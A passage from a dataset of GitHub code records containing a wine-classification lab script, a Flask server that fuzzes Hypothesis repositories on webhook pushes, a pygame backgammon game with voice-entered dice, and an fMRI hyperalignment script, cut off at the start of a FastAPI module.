\"Ash\",\r\n \"Alcalinity of ash\",\r\n \"Magnesium\",\r\n \"Total phenols\",\r\n \"Flavanoids\",\r\n \"Nonflavanoid phenols\",\r\n \"Proanthocyanins\",\r\n \"Color intensity\",\r\n \"Hue\",\r\n \"OD280/OD315 of diluted wines\",\r\n \"Proline\",\r\n]\r\n\r\ndf = pd.read_csv(\"wine.data\", index_col=False, names=columns)\r\ndf.head()\r\n\r\n\r\n''' X-ознаки вина\r\n У-його клас\r\n'''\r\nX = df.loc[:, df.columns != \"Class\"]\r\ny = df[\"Class\"]\r\n\r\n'''\r\n крос-валідація по п'яти блоках\r\n'''\r\ncv = KFold(n_splits=5, shuffle=True, random_state=42)\r\n\r\n'''\r\n точність крос-валідації для К = [1,50]\r\n'''\r\ndef get_best_score(X: pd.DataFrame, y: pd.Series, cv) -> Tuple[float, int]:\r\n best_score, best_k = None, None\r\n\r\n for k in range(1, 51):\r\n model = KNeighborsClassifier(n_neighbors=k)\r\n score = cross_val_score(model, X, y, cv=cv, scoring=\"accuracy\").mean()\r\n \r\n if best_score is None or score > best_score:\r\n best_score, best_k = score, k\r\n \r\n return best_score, best_k\r\n\r\n\r\nscore, k = get_best_score(X, y, cv)\r\nprint(1, str(k))\r\nprint(2, f\"{score:.2f}\")\r\n\r\n'''\r\n масштабування ознак\r\n'''\r\nscore, k = get_best_score(scale(X), y, cv)\r\n\r\n\r\nprint(3, str(k))\r\nprint(4, f\"{score:.2f}\")","repo_name":"RomanStoronskiy/AI_lab","sub_path":"3/statement-neighbours.py","file_name":"statement-neighbours.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22339521291","text":"import json\nimport logging\nimport logging.handlers\nimport os\nimport sys\nimport yaml\n\nfrom .errors import ConfigMissingOptionException\nfrom .fuzzing import RepoFuzzer\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom flask import Flask, request, send_from_directory, jsonify\nfrom sys import platform\nfrom datetime import datetime\n\nlogging.basicConfig(datefmt='%d-%b-%y %H:%M:%S',\n filename='fuzz_server.log',\n format='%(asctime)s: %(name)s: %(levelname)s: %(message)s')\n\nif platform.startswith('linux'):\n sysLogHandler = logging.handlers.SysLogHandler(address='/dev/log')\n sysLogHandler.setLevel(logging.DEBUG)\n logging.getLogger(__name__).addHandler(sysLogHandler)\n\nstreamHandler = logging.StreamHandler(sys.stdout)\nstreamHandler.setLevel(logging.INFO)\nlogging.getLogger(__name__).addHandler(streamHandler)\n\nlogger = logging.getLogger(__name__)\n\n\nclass FuzzServer:\n\n def __init__(self, config_path='config.yml'):\n\n logger.debug('Initialising fuzzing server.')\n\n self.app = Flask(__name__, static_url_path='/build')\n CORS(self.app)\n self.app.config['SQLALCHEMY_DATABASE_URI'] = \\\n os.environ.get('DATABASE_URL', 'sqlite:///data.db')\n self.app.config['SQLALCHEMY_TRACK_MODIFICATION'] = False\n\n self._load_config(config_path)\n self._init_fuzzers()\n self.db = SQLAlchemy(self.app)\n self._start_time = datetime.now()\n\n logger.info('Fuzzing server initialised.')\n\n def run(self, **kwargs):\n\n logger.info('Fuzzing server started running.')\n\n self.db.create_all()\n self._setup_routes()\n\n for (name, owner), fuzzer in self.fuzzers.items():\n\n if \"fuzz_on_start\" in fuzzer.config:\n if fuzzer.config[\"fuzz_on_start\"]:\n fuzzer.start()\n else:\n fuzzer.start()\n\n self.app.run(**kwargs)\n\n logger.debug('Fuzzing server stopped running.')\n\n def _setup_routes(self):\n\n logger.info('Setting up routes.')\n\n @self.app.route('/all_info', methods=['GET'])\n def get_data():\n repositories = []\n\n for (name, owner), fuzzer in self.fuzzers.items():\n data = fuzzer.get_errors()\n repositories.append(data)\n\n return jsonify({\n \"start_time\": self._start_time,\n \"uptime\": str(datetime.now() - self._start_time),\n \"repositories\": repositories\n })\n\n @self.app.route('/webhook', methods=['POST'])\n def on_git_push():\n data = json.loads(request.data)\n name = data['repository']['name']\n owner = data['repository']['owner']['name']\n\n try:\n fuzzer = self.fuzzers[(name, owner)]\n logger.debug('Git push for repository %s occurred.',\n fuzzer.name)\n\n return fuzzer.on_webhook(data)\n except KeyError:\n logger.error('Server not configured to fuzz this repository.')\n err_message = ('Hypothesis server has not been configured to '\n 'fuzz this repository.')\n\n return err_message, 404\n\n @self.app.route('/', methods=['GET'])\n def home():\n return send_from_directory('build', 'index.html')\n\n @self.app.route('/', methods=['GET'])\n def serve_static(path):\n return send_from_directory('build', path)\n\n @self.app.route('/get_errors', methods=['POST'])\n def get_errors():\n data = json.loads(request.data)\n name = data['name']\n owner = data['owner']\n try:\n fuzzer = self.fuzzers[(name, owner)]\n\n return jsonify(fuzzer.get_errors())\n except KeyError:\n logger.error('Server not configured to fuzz this repository.')\n err_message = ('Hypothesis server has not been configured to '\n 'fuzz this repository.')\n\n return err_message, 404\n\n logger.debug('Routes set up.')\n\n def _load_config(self, config_path):\n\n logger.debug('Loading server configurations.')\n\n try:\n with open(config_path) as file:\n logger.info('Opening file config_path.')\n self.config = yaml.load(file)\n\n if 'repos' not in self.config:\n logger.error('Configuration file missing repos.')\n raise ConfigMissingOptionException('Configuration file ' +\n 'missing a repos ' +\n 'attribute.')\n logger.info('File config_path loaded.')\n except FileNotFoundError:\n logger.error('File config.yml not found.')\n raise FileNotFoundError('config.yml file not found. ' +\n 'Create one or specify config path.')\n\n logger.info('Server configurations loaded.')\n\n def _init_fuzzers(self):\n\n logger.debug('Initialising fuzzers.')\n\n self.fuzzers = {}\n\n for repo, repo_config in self.config['repos'].items():\n repo_name = repo_config['name']\n repo_owner = repo_config['owner']\n\n self.fuzzers[(repo_name, repo_owner)] = RepoFuzzer(repo_name,\n repo_config)\n\n logger.info('Fuzzers initialised.')\n","repo_name":"hypothesis-imperial/hypothesis-server","sub_path":"hypothesisfuzzer/fuzz_server.py","file_name":"fuzz_server.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12582226719","text":"import pygame\nimport random\nimport os\nimport speech_recognition as sr\n\n\ndef create_speech_dice():\n \"\"\"\n Uses voice recognition to write two numbers in the file dice.txt\n \"\"\"\n recognizer = sr.Recognizer()\n microphone = sr.Microphone()\n values = \"\"\n with microphone as source:\n recognizer.adjust_for_ambient_noise(source)\n audio = recognizer.listen(source)\n try:\n values = recognizer.recognize_google(audio, language=\"ro-Ro\")\n except (Exception, ):\n pass\n print(values)\n first_num = second_num = 0\n for i in range(0, len(values) - 1):\n if '1' <= values[i] <= '6' and '1' <= values[i + 1] <= '6':\n first_num = int(values[i])\n second_num = int(values[i + 1])\n if first_num != 0 and second_num != 0:\n result = str(first_num) + \" \" + str(second_num)\n f = open(\"../Dice.txt\", \"w\")\n f.write(result)\n f.close()\n print(first_num, second_num)\n\n\ndef initialize():\n \"\"\"\n Initializes PyGame and the window\n :return:\n \"\"\"\n os.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (150, 30)\n pygame.init()\n pygame.display.set_caption('Backgammon')\n\n\ndef play_game():\n \"\"\"\n Long-ass function to play the whole game.\n :return:\n \"\"\"\n # sound\n sound_dice = pygame.mixer.Sound(\"../Sounds/Dice-Sound.wav\")\n sound_piece = pygame.mixer.Sound(\"../Sounds/Piece-Move.wav\")\n\n # screen\n size = (800, 800)\n screen = pygame.display.set_mode(size)\n background = pygame.image.load(\"../Images/Board.png\")\n\n # buttons\n button_roll = pygame.image.load(\"../Images/Button-Roll.png\")\n # button_roll = pygame.transform.scale(button_roll, (100, 100))\n button_undo = pygame.image.load(\"../Images/Button-Undo.png\")\n button_done = pygame.image.load(\"../Images/Button-Done.png\")\n\n # game data\n table = default_table()\n # Table has w or b for pieces from 0 to 23,\n # and the number of out pieces on 24(b) and 25(w)\n playing = True\n black_pips = 167\n white_pips = 167\n\n # moved_dice = 0\n # dice_capacity = 2\n # dices1 = dices2 = 1\n\n dices_thrown = False\n dice_values = [[0, False, False], [0, False, False], [0, False, False], [0, False, False]]\n dice_position = 0\n # dice_values pattern: [[Value, Not Used Yet, Available]]\n\n stage = ['roll', 'piece moved', 'all pieces', 'start roll', 'nothing']\n turn = ['white', 'black']\n current_turn = 0\n current_stage = 3\n\n undo_stack = []\n dice_undo_stack = []\n position_undo_stack = []\n\n can_speech = False\n\n # text\n pygame.font.init()\n pipfont = pygame.font.SysFont('Times New Roman', 50)\n turn_font = pygame.font.SysFont('Times New Roman', 15)\n\n while playing:\n # pygame.mouse.set_cursor(*pygame.cursors.diamond)\n mouse = pygame.mouse.get_pos()\n # click = pygame.mouse.get_pressed(3)\n\n # text\n blacksurface = pipfont.render(str(black_pips), True, (0, 0, 0))\n whitesurface = pipfont.render(str(white_pips), True, (0, 0, 0))\n who_turns = turn_font.render(turn[current_turn], True, (0, 0, 0))\n\n # blit\n screen.blit(background, (0, 0))\n screen.blit(whitesurface, (362, -7))\n screen.blit(blacksurface, (362, 752))\n if current_stage != 3:\n screen.blit(who_turns, (40, 21))\n put_pieces(screen, table)\n if dices_thrown:\n put_dice(screen, dice_values, dice_position)\n\n if stage[current_stage] == 'roll' or stage[current_stage] == 'start roll':\n screen.blit(button_roll, (541, 353))\n if stage[current_stage] == 'piece moved':\n screen.blit(button_undo, (541, 353))\n if stage[current_stage] == 'all pieces':\n screen.blit(button_undo, (471, 353))\n screen.blit(button_done, (611, 353))\n\n if can_speech is True and current_stage == 0:\n # create_speech_dice()\n can_speech = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playing = False\n\n if event.type == pygame.MOUSEBUTTONUP:\n # print(mouse[0], mouse[1])\n # print(click)\n pos_x = mouse[0]\n pos_y = mouse[1]\n # Roll\n if current_stage == 0 or current_stage == 3:\n # Roll Button\n if 368 <= pos_y <= 438 and 541 <= pos_x <= 700:\n if current_stage == 0 and pos_x > 640:\n create_speech_dice()\n [dices1, dices2] = get_dice()\n if current_stage == 3:\n while dices1 == dices2:\n [dices1, dices2] = get_dice()\n dice_undo_stack = []\n position_undo_stack = []\n if dices1 < dices2:\n dices1, dices2 = dices2, dices1\n if current_stage == 3:\n current_turn = 1\n dice_values[0][0] = dices1\n dice_values[0][1] = True\n dice_values[0][2] = check_available(table, dices1, turn[current_turn])\n dice_values[1][0] = dices2\n dice_values[1][1] = True\n dice_values[1][2] = check_available(table, dices2, turn[current_turn])\n if dices1 == dices2:\n dice_values[2] = [0, False, False]\n dice_values[3] = [0, False, False]\n dice_values[2][0] = dice_values[3][0] = dices1\n\n dice_values[2][1] = True\n dice_values[2][2] = check_available(table, dices1, turn[current_turn])\n dice_values[3][1] = True\n dice_values[3][2] = check_available(table, dices1, turn[current_turn])\n else:\n dice_values[2] = [0, False, False]\n dice_values[3] = [0, False, False]\n dices_thrown = True\n dice_position = 0\n if dice_values[dice_position][2] is False or dice_values[dice_position][1] is False:\n dice_position = get_next_position(dice_values, dice_position)\n # print(dice_values)\n pygame.mixer.Sound.play(sound_dice)\n clear_file()\n play_sound(dices1, dices2)\n current_stage = 4\n if can_turn(dice_values) is False:\n current_stage = 2\n\n if current_stage == 4 or current_stage == 1:\n # Move pieces\n click_on_piece = False\n if 40 <= pos_x <= 760 and 40 <= pos_y <= 356:\n click_on_piece = True\n if 40 <= pos_x <= 760 and 450 <= pos_y <= 760:\n click_on_piece = True\n if 40 <= pos_x <= 380 and 356 <= pos_y <= 450:\n dice_position = get_next_position(dice_values, dice_position)\n\n if click_on_piece:\n row = pos_x - 40\n row = row // 56\n if 450 <= pos_y <= 760:\n row += 12\n if 40 <= pos_y <= 356:\n row = 11 - row\n if row == 5:\n row = -1\n elif row < 5:\n row += 1\n if row == 18:\n row = -1\n elif row > 18:\n row -= 1\n if can_turn(dice_values):\n undo_stack.append(full_copy(table))\n dice_undo_stack.append(full_dice_copy(dice_values))\n position_undo_stack.append(dice_position)\n if row != -1:\n usable = True\n if dice_values[dice_position][1] is False or dice_values[dice_position][2] is False:\n usable = False\n if usable and perform_move(table, turn[current_turn], row, dice_values[dice_position][0]):\n dice_values[dice_position][1] = False\n dice_position = get_next_position(dice_values, dice_position)\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if dice_values[dice_position][2] is False or dice_values[dice_position][1] is False:\n dice_position = get_next_position(dice_values, dice_position)\n position_undo_stack[-1] = dice_position\n if can_turn(dice_values):\n current_stage = 1\n else:\n current_stage = 2\n else:\n undo_stack.pop(-1)\n dice_undo_stack.pop(-1)\n position_undo_stack.pop(-1)\n else:\n # if perform_move(table, turn[current_turn], row, dices1):\n usable = True\n if dice_values[dice_position][1] is False or dice_values[dice_position][2] is False:\n usable = False\n if usable and discard_out_piece(table, turn[current_turn], dice_values[dice_position][0]):\n dice_values[dice_position][1] = False\n dice_position = get_next_position(dice_values, dice_position)\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if dice_values[dice_position][2] is False or dice_values[dice_position][1] is False:\n dice_position = get_next_position(dice_values, dice_position)\n position_undo_stack[-1] = dice_position\n if can_turn(dice_values):\n current_stage = 1\n else:\n current_stage = 2\n else:\n undo_stack.pop(-1)\n dice_undo_stack.pop(-1)\n position_undo_stack.pop(-1)\n [white_pips, black_pips] = compute_pips(table)\n if current_stage == 1:\n # Undo Button\n if 368 <= pos_y <= 438 and 541 <= pos_x <= 640:\n if len(undo_stack) > 0:\n table = undo_stack.pop(-1)\n pygame.mixer.Sound.play(sound_piece)\n dice_values = dice_undo_stack.pop(-1)\n dice_position = position_undo_stack.pop(-1)\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if len(undo_stack) == 0:\n current_stage = 4\n [white_pips, black_pips] = compute_pips(table)\n if current_stage == 2:\n # Undo Shifted Left\n if 368 <= pos_y <= 438 and 470 <= pos_x <= 570:\n if len(undo_stack) > 0:\n table = undo_stack.pop(-1)\n pygame.mixer.Sound.play(sound_piece)\n dice_values = dice_undo_stack.pop(-1)\n dice_position = position_undo_stack.pop(-1)\n current_stage = 1\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if 368 <= pos_y <= 438 and 610 <= pos_x <= 710:\n dices_thrown = False\n if current_turn == 0:\n current_turn = 1\n elif current_turn == 1:\n current_turn = 0\n current_stage = 0\n undo_stack = []\n dice_undo_stack = []\n position_undo_stack = []\n can_speech = True\n [white_pips, black_pips] = compute_pips(table)\n\n # screen.blit(pygame.transform.rotate(screen, 180), (0, 0))\n\n pygame.display.update()\n\n\ndef can_turn(dice_table):\n \"\"\"\n Looks at all the dice and returns True if there is any available dice\n \"\"\"\n to_return = False\n # print(dice_table)\n for i in range(0, 4):\n if dice_table[i][0] != 0:\n if dice_table[i][2]:\n if dice_table[i][1]:\n to_return = True\n return to_return\n\n\ndef get_next_position(dice_table, position):\n \"\"\"\n Iterates through the dice that were cast\n :return: new position (from 0 to 4)\n \"\"\"\n # print(dice_table, position)\n dice_values = dice_table\n dice_position = position\n dice_position += 1\n if dice_values[3][0] == 0 and dice_position == 2:\n dice_position = 0\n if dice_values[3][0] != 0 and dice_position == 4:\n dice_position = 0\n while dice_values[dice_position][1] is False or dice_values[dice_position][2] is False:\n dice_position += 1\n if dice_values[3][0] == 0 and dice_position == 2:\n dice_position = 0\n if dice_values[3][0] != 0 and dice_position == 4:\n dice_position = 0\n if dice_position == position:\n return position\n\n return dice_position\n\n\ndef full_copy(table):\n \"\"\"\n Returns a deep copy of the given table, made for undo\n \"\"\"\n to_ret = []\n for i in range(0, 24):\n to_ret.append([])\n for j in table[i]:\n to_ret[i].append(j)\n to_ret.append(table[24])\n to_ret.append(table[25])\n return to_ret\n\n\ndef full_dice_copy(table):\n \"\"\"\n Deepcopy of the dice values\n \"\"\"\n to_ret = [[0, False, False], [0, False, False], [0, False, False], [0, False, False]]\n for i in range(0, 4):\n to_ret[i][0] = table[i][0]\n to_ret[i][1] = table[i][1]\n to_ret[i][2] = table[i][2]\n return to_ret\n\n\ndef default_table():\n \"\"\"\n Initializes the default table\n :return: List\n \"\"\"\n to_return = []\n for i in range(0, 24):\n to_return.append([])\n b = 'b'\n w = 'w'\n to_return[0] = [b, b]\n to_return[5] = [w, w, w, w, w]\n to_return[7] = [w, w, w]\n to_return[11] = [b, b, b, b, b, b, b, b]\n to_return[12] = [w, w, w, w, w]\n to_return[16] = [b, b, b]\n to_return[18] = [b, b, b, b, b]\n to_return[23] = [w, w]\n to_return.append(0) # Number of out black-pieces\n to_return.append(0) # Number of out white-pieces\n # game_sample(to_return)\n return to_return\n\n\ndef compute_pips(table):\n \"\"\"\n Computes the number of remaining moves each player has to make\n :return: a table containing the values for white and black\n \"\"\"\n white_pips = 0\n black_pips = 0\n for i in range(0, 24):\n for j in table[i]:\n if j == 'w':\n white_pips += (i + 1)\n if j == 'b':\n black_pips += (24 - i)\n white_pips += table[25] * 25\n black_pips += table[24] * 25\n return [white_pips, black_pips]\n\n\ndef game_sample(table):\n \"\"\"\n Sample game for debugging purposes\n \"\"\"\n to_return = table\n perform_move(to_return, 'black', 16, 1)\n perform_move(to_return, 'white', 23, 6)\n discard_out_piece(to_return, 'black', 4)\n perform_move(to_return, 'white', 23, 4)\n perform_move(to_return, 'black', 16, 1)\n perform_move(to_return, 'black', 18, 1)\n # return\n discard_out_piece(to_return, 'white', 4)\n discard_out_piece(to_return, 'white', 5)\n discard_out_piece(to_return, 'black', 4)\n\n\ndef check_available(table, dice, colour):\n \"\"\"\n Checks if the value from dice can be used on the table\n :return: True/ False\n \"\"\"\n if dice > 6:\n return False\n if colour == 'black':\n colour = 'b'\n if colour == 'white':\n colour = 'w'\n\n # First checks for out pieces\n if colour == 'w':\n if table[25] > 0:\n if check_moves(table, colour)[24 - dice]:\n return True\n else:\n return False\n if colour == 'b':\n if table[24] > 0:\n if check_moves(table, colour)[dice - 1]:\n return True\n else:\n return False\n\n # Check for the rest\n available = False\n if colour == 'b':\n for i in range(0, 23 - dice):\n if check_moves(table, colour)[i + dice]:\n available = True\n if colour == 'w':\n for i in range(23, dice + 1, -1):\n if check_moves(table, colour)[i - dice]:\n available = True\n return available\n\n\ndef check_moves(table, colour):\n \"\"\"\n Checks the possible moves for the given colour (black/white)\n :return: List of booleans\n \"\"\"\n to_ret = []\n if colour == 'black':\n colour = 'b'\n elif colour == 'white':\n colour = 'w'\n for i in range(0, 24):\n to_ret.append(False)\n for i in range(0, 24):\n if len(table[i]) == 0:\n to_ret[i] = True\n if len(table[i]) == 1 and table[i][0] != colour:\n to_ret[i] = True\n if len(table[i]) > 0 and table[i][0] == colour:\n to_ret[i] = True\n return to_ret\n\n\ndef perform_move(table, colour, row, value):\n \"\"\"\n Performs a valid move\n :return: True if move was performed, False otherwise\n \"\"\"\n if row < -1 or row > 23:\n print('Move not available!')\n return False\n if colour == 'black':\n colour = 'b'\n elif colour == 'white':\n colour = 'w'\n if colour == 'b':\n new_position = row + value\n else:\n new_position = row - value\n if colour == 'w' and table[25] > 0 and row != -1:\n print('Move not available!')\n return False\n if colour == 'b' and table[24] > 0 and row != -1:\n print('Move not available!')\n return False\n performable = True\n if row == -1:\n new_position = value\n else:\n if row != -1:\n if len(table[row]) == 0 or table[row][0] != colour:\n print('Move not available!')\n return False\n else:\n if colour == 'b' and table[24] == 0:\n print('Move not available!')\n return False\n if colour == 'w' and table[25] == 0:\n print('Move not available!')\n return False\n if new_position > 23 or new_position < 0:\n print('Move not available!')\n return False\n if check_moves(table, colour)[new_position] is False:\n performable = False\n if performable:\n sound_piece = pygame.mixer.Sound(\"../Sounds/Piece-Move.wav\")\n sound_oo = pygame.mixer.Sound(\"../Sounds/Sunet-Oo.wav\")\n pygame.mixer.Sound.play(sound_piece)\n if row != -1:\n table[row].pop(-1)\n if len(table[new_position]) == 0:\n table[new_position] = [colour]\n else:\n if table[new_position][0] != colour:\n table[new_position] = [colour]\n if colour == 'w':\n # If colour is white, it means that the other piece is black\n # print(\"Out Black Piece!\")\n pygame.mixer.Sound.play(sound_oo)\n table[24] += 1\n if colour == 'b':\n table[25] += 1\n # print(\"Out White Piece!\")\n pygame.mixer.Sound.play(sound_oo)\n else:\n table[new_position].append(colour)\n return True\n else:\n print('Move not available!')\n return False\n\n\ndef discard_out_piece(table, colour, value):\n \"\"\"\n Puts a piece back on the table after it was taken out\n \"\"\"\n if colour == 'black':\n colour = 'b'\n elif colour == 'white':\n colour = 'w'\n\n if colour == 'b':\n if table[24] < 1:\n print('Move not available!')\n return False\n if check_moves(table, colour)[value - 1] is True:\n if perform_move(table, colour, -1, value - 1):\n table[24] -= 1\n return True\n else:\n print('Move not available!')\n return False\n if colour == 'w':\n if table[25] < 1:\n print('Move not available!')\n return False\n if check_moves(table, colour)[24 - value] is True:\n if perform_move(table, colour, -1, 24 - value):\n table[25] -= 1\n return True\n else:\n print('Move not available!')\n return False\n\n\ndef put_pieces(screen, table):\n \"\"\"\n Blits the pieces to the screen\n \"\"\"\n white_piece = pygame.image.load(\"../Images/Piece-White.png\")\n black_piece = pygame.image.load(\"../Images/Piece-Black.png\")\n for i in range(0, 24):\n for j in range(0, len(table[i])):\n if table[i][j] == 'w':\n screen.blit(white_piece, get_piece_position(i, j))\n if table[i][j] == 'b':\n screen.blit(black_piece, get_piece_position(i, j))\n for i in range(0, table[24]):\n black_piece = pygame.transform.scale(black_piece, (50, 50))\n screen.blit(black_piece, get_piece_position(-1, i)) # -1 for black pieces\n for i in range(0, table[25]):\n white_piece = pygame.transform.scale(white_piece, (50, 50))\n screen.blit(white_piece, get_piece_position(-2, i)) # -2 for white pieces\n\n\ndef get_dice():\n \"\"\"\n Checks if there is a value in the file. If there is not, generates a random one.\n If there are 2 values in the file, then it takes the values.\n :return:\n \"\"\"\n f = open(\"../Dice.txt\")\n value1 = 1\n value2 = 1\n line = str(f.readline())\n try:\n x = int(line[0])\n if 1 <= x <= 6:\n value1 = x\n x = int(line[2])\n if 1 <= x <= 6:\n value2 = x\n except (Exception,):\n value1 = random.randint(1, 6)\n value2 = random.randint(1, 6)\n\n f.close()\n return [value1, value2]\n\n\ndef put_dice(screen, dice_table, current_dice):\n \"\"\"\n Blits the dice with a given value to the screen.\n \"\"\"\n # dice_first = rotated_image = pygame.transform.rotate(dice_2, 30)\n dice_1 = pygame.image.load(\"../Images/Dice-1.png\")\n dice_2 = pygame.image.load(\"../Images/Dice-2.png\")\n dice_3 = pygame.image.load(\"../Images/Dice-3.png\")\n dice_4 = pygame.image.load(\"../Images/Dice-4.png\")\n dice_5 = pygame.image.load(\"../Images/Dice-5.png\")\n dice_6 = pygame.image.load(\"../Images/Dice-6.png\")\n dice_s = pygame.image.load(\"../Images/Dice-Shadow.png\")\n dices = [dice_s, dice_1, dice_2, dice_3, dice_4, dice_5, dice_6]\n dice_positions = [[148, 363], [227, 393], [78, 383], [297, 373]]\n # first_dice = dices[value1]\n # second_dice = dices[value2]\n # screen.blit(dice_s, (153 + value1, 368 + value2))\n # screen.blit(first_dice, (148 + value1, 363 + value2))\n # # second_dice = pygame.transform.scale(second_dice, (45, 45))\n # # dice_s = pygame.transform.scale(dice_s, (45, 45))\n # screen.blit(dice_s, (232 + value2, 398 + value1))\n # screen.blit(second_dice, (227 + value2, 393 + value1))\n all_used = False\n for i in range(0, 4):\n if dice_table[i][1] == True and dice_table[i][2] == True:\n all_used = True\n if all_used is False:\n current_dice = -1\n for i in range(3, -1, -1):\n if dice_table[i][0] != 0:\n dice_pic = dices[dice_table[i][0]]\n dice_s = pygame.image.load(\"../Images/Dice-Shadow.png\")\n dice_pic.set_alpha(255)\n dice_s.set_alpha(255)\n if i == current_dice:\n dice_pic = pygame.transform.scale(dice_pic, (70, 70))\n dice_s = pygame.transform.scale(dice_s, (70, 70))\n if dice_table[i][1] == False or dice_table[i][2] == False:\n dice_pic.set_alpha(80)\n dice_s.set_alpha(80)\n screen.blit(dice_s, (dice_positions[i][0] + dice_table[i][0] + 5, dice_positions[i][1] + dice_table[i][0] + 5))\n screen.blit(dice_pic, (dice_positions[i][0] + dice_table[i][0], dice_positions[i][1] + dice_table[i][0]))\n\n\ndef get_piece_position(row, height):\n \"\"\"\n Gets the pixel position for a given piece.\n -1 for black out pieces, -2 for white out pieces\n \"\"\"\n # piece_x = 700\n # piece_y = 40\n if row == -1:\n piece_x = 374\n piece_y = 28 + height * 43\n return piece_x, piece_y\n elif row == -2:\n piece_x = 374\n piece_y = 710 - height * 43\n return piece_x, piece_y\n else:\n x_positions = [700, 644, 588, 532, 476, 420, 320, 264, 208, 152, 96, 40, 40, 96, 152, 208, 264, 320, 420, 476, 532, 588, 644, 700]\n piece_x = x_positions[row]\n if row <= 11:\n piece_y = 40 + height * 52\n else:\n piece_y = 703 - height * 52\n return piece_x, piece_y\n\n\ndef clear_file():\n \"\"\"\n Clears the file with dice values\n \"\"\"\n f = open(\"../Dice.txt\", \"w\")\n f.write(\"x x\")\n f.close()\n\n\ndef play_sound(value1, value2):\n \"\"\"\n Plays certain sound effects for certain dice values. Mostly manele.\n \"\"\"\n if value1 < value2:\n value2, value1 = value1, value2\n sound_66 = pygame.mixer.Sound(\"../Sounds/Sunet-66.wav\")\n sound_66_2 = pygame.mixer.Sound(\"../Sounds/Sunet-66-2.wav\")\n sound_66_3 = pygame.mixer.Sound(\"../Sounds/Sunet-66-3.wav\")\n sound_65 = pygame.mixer.Sound(\"../Sounds/Sunet-65.wav\")\n sound_64 = pygame.mixer.Sound(\"../Sounds/Sunet-64.wav\")\n sound_44 = pygame.mixer.Sound(\"../Sounds/Sunet-44.wav\")\n # sound_42 = pygame.mixer.Sound(\"../Sounds/Sunet-42.wav\")\n # sound_41 = pygame.mixer.Sound(\"../Sounds/Sunet-41.wav\")\n sound_11 = pygame.mixer.Sound(\"../Sounds/Sunet-11.wav\")\n sound_12 = pygame.mixer.Sound(\"../Sounds/Sunet-12.wav\")\n if value1 == 6 and value2 == 6:\n rdm = random.randint(1, 3)\n if rdm == 1:\n pygame.mixer.Sound.play(sound_66)\n if rdm == 2:\n pygame.mixer.Sound.play(sound_66_2)\n if rdm == 3:\n pygame.mixer.Sound.play(sound_66_3)\n if value1 == 6 and value2 == 4:\n pygame.mixer.Sound.play(sound_64)\n if value1 == 6 and value2 == 5:\n pygame.mixer.Sound.play(sound_65)\n if value1 == 4 and value2 == 4:\n pygame.mixer.Sound.play(sound_44)\n # if value1 == 4 and value2 == 2:\n # pygame.mixer.Sound.play(sound_42)\n # if value1 == 4 and value2 == 1:\n # pygame.mixer.Sound.play(sound_41)\n if value1 == 1 and value2 == 1:\n pygame.mixer.Sound.play(sound_11)\n if value1 == 2 and value2 == 1:\n pygame.mixer.Sound.play(sound_12)\n\n\nif __name__ == '__main__':\n initialize()\n play_game()\n","repo_name":"BlackAlexander/Backgammon","sub_path":"Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72582128564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 28 14:15:55 2018\n\n@author: lg03\n\"\"\"\n\nimport os\nimport numpy as np\nfrom mvpa2.suite import *\nfrom nibabel import load, save\nfrom sklearn.model_selection import KFold\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport time\n\n#load subject information\nexec(open('load_subject_info_for_statedetection.py').read())\ndatadir = '/home/lingee/wrkgrp/Cambridge_data/Movie_HMM/Data_for_Donders/'\nkfold = 5 #15\nsubin = np.nonzero(age <= 50)[0]\nIDs = CBUID[subin]\n\nstart = time.time()\nkf = KFold(n_splits=kfold, shuffle=True, random_state=1)\n\nmaskname = datadir + 'data_plus_GM_mask.nii'\n\ndef compute_ISS(run_datasets):\n subsim = np.empty((len(run_datasets), len(run_datasets)))\n for i in range(len(run_datasets)):\n for j in range(i, len(run_datasets)):\n subsim[i, j] = np.mean(np.mean(np.multiply(run_datasets[i][:,1], run_datasets[j][:,1]), 0))\n subsim[j, i] = subsim[i, j]\n refsub = np.argmax(np.mean(subsim, 0))\n return refsub\n\ncount = -1\nfor train_index, test_index in kf.split(np.arange(0, np.shape(subin)[0])):\n count = count + 1\n datasets = []\n for idx in test_index:\n name = IDs[idx][0] + '_s0w_ME_denoised.nii'\n datasets.append(name)\n\n run_datasets = []\n for i in datasets:\n print(i)\n fds = fmri_dataset(samples=datadir + i, mask=maskname)\n fds = fds[0:192, :]\n zscore(fds, chunks_attr=None, param_est=None)\n run_datasets.append(fds)\n\n refsub = compute_ISS(run_datasets)\n\n hyper = Hyperalignment(level1_equal_weight=True)\n slhyper = SearchlightHyperalignment(radius=3, sparse_radius=2, ref_ds=refsub, compute_recon=False, hyperalignment=hyper)\n\n slhypmaps = slhyper(run_datasets)\n ds_hyper = [h.forward(sd) for h, sd in zip(slhypmaps, run_datasets)]\n\n for i in range(len(run_datasets)):\n img = map2nifti(ds_hyper[i])\n save(img, datadir + str(kfold) + 'group_hyperalignment/' + datasets[i][0:9] + '_hyperaligned_g' + str(count) + '.nii')\n\n print('It took', time.time() - start, 'seconds.')\n\n","repo_name":"lgeerligs/NestedHierarchy","sub_path":"Data preparation/searchlight_hyperalignment_groups.py","file_name":"searchlight_hyperalignment_groups.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33429984957","text":"from api import Articles\nfrom fastapi.responses import JSONResponse\nfrom fastapi import APIRouter\n\nrouter = 